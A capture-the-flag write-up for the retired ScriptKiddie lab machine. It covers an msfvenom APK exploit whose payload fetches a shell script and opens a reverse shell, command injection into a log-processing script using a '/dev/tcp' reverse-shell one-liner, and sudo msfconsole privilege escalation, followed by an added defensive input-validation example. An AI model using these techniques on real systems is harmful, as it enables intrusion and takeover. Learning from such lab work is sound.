ScriptKiddie is a retired vulnerable machine running the Linux operating system. We are expected to obtain the user and root flags by exploiting its vulnerabilities.
To get to know the target machine, we first perform a network scan with nmap.
Classic Scan

The port scan shows that 22/tcp (ssh, OpenSSH 8.2p1) and 5000/tcp (http, Werkzeug) are open. Since there is no vulnerability on the ssh port, we continue the enumeration on port 5000.
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
Let's research the service on this port.
(Werkzeug: Werkzeug is a comprehensive WSGI web application library. WSGI (Web Server Gateway Interface) is a specification that describes how a web server communicates with web applications and how web applications can be chained together to process a request. https://werkzeug.palletsprojects.com/en/2.3.x/)

The page offers nmap, payloads and sploits options. We tested these options and they work. We then ran gobuster to see whether there are any other directories or files.

The directory search yielded no results, so we focus entirely on the Werkzeug side.
We realized that the nmap, searchsploit and msfvenom tools are behind these options.
We search with searchsploit to see whether there is a vulnerability in msfvenom, which the web side uses.

We see that there is a vulnerability related to msfvenom, so let's create our shell from our attacker machine.

We saved the exploit code and changed its payload part with nano; the payload will run our shell file on the other side.

We have edited the payload part; next we create the exploit.

We created the exploit and moved it to our main folder as evil.apk.
After moving evil.apk to the main folder, let's create the Shell.sh file used in the payload.

Our shell file has been created. Now let's start a web server with Python so that we can access our exploit evil.apk.

As we can see, our shell file was fetched and gave us a reverse shell.

Here we got our user flag.
Since we do not have access to the /root directory, let's perform privilege escalation.

To escalate privileges on the machine, we perform local enumeration first.

find / -perm -u=s -type f 2>/dev/null
find /pwn -perm -u=s -type f 2>/dev/null
We run these commands to see which files have the setuid bit set and therefore run with their owner's privileges, such as root.

The /home/pwn/scanlosers.sh file draws our attention, so let's see what is in it.

Command injection is expected here: the cut -f3 command tells us that the first 6 characters are cut, and then this command is executed.
We will supply a suitable reverse shell:
/bin/bash -c ‘bash -i >& /dev/tcp/ 0>1
We use the command.

The purpose of using # here is to turn everything after the # into a comment.
After running this command, we have a shell as the user pwn.
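
The injection above works because a field read from a file is pasted into a shell command string. As an added example (not the machine's script or the author's code), this POSIX shell code validates the field as an IPv4 address before it is used; the log format, the function names and the sample lines are assumptions constructed for illustration.

```sh
#!/bin/sh
# Added example (not the machine's script): validate a log field before it
# reaches a command line. Assumed log format, constructed for this example:
#   "[<date> <time>] <source-ip>"  (space separated, third field = address)

# Succeed only if $1 is a dotted-quad IPv4 address, each octet 0-255.
is_ipv4() {
    case $1 in
        ''|*[!0-9.]*|.*|*.) return 1 ;;   # digits and inner dots only
    esac
    old_ifs=$IFS; IFS=.
    set -- $1                              # split on dots (no glob chars left)
    IFS=$old_ifs
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        case $octet in
            ''|????*) return 1 ;;          # empty or longer than 3 digits
        esac
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# Read log lines on stdin; print "SCAN <ip>" for valid entries, "REJECT" otherwise.
# A real job would run its scanner here with "$ip" as one quoted argument,
# never by pasting the field into a string handed to `sh -c`.
process_log() {
    cut -d' ' -f3- | sort -u | while IFS= read -r ip; do
        if is_ipv4 "$ip"; then
            printf 'SCAN %s\n' "$ip"
        else
            printf 'REJECT\n'
        fi
    done
}

# Constructed sample: one clean entry, one carrying shell metacharacters.
sample_log() {
    printf '%s\n' \
        '[2021-02-03 10:00:01] 10.10.10.5' \
        '[2021-02-03 10:00:02] 10.10.10.6; echo injected #'
}
```

Running `sample_log | process_log` accepts the clean address and rejects the entry with the trailing `; ... #`, so the metacharacters never reach a shell.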

Again, we do not have root access, so we perform local enumeration once more to escalate privileges.
We run sudo -l to see which sudo privileges we have.

Here we see that msfconsole can be run with sudo privileges.
Let's check GTFOBins to see how we can use it to get root privileges.

Using /bin/bash commands, we obtain root privileges.

Here we got the root flag.

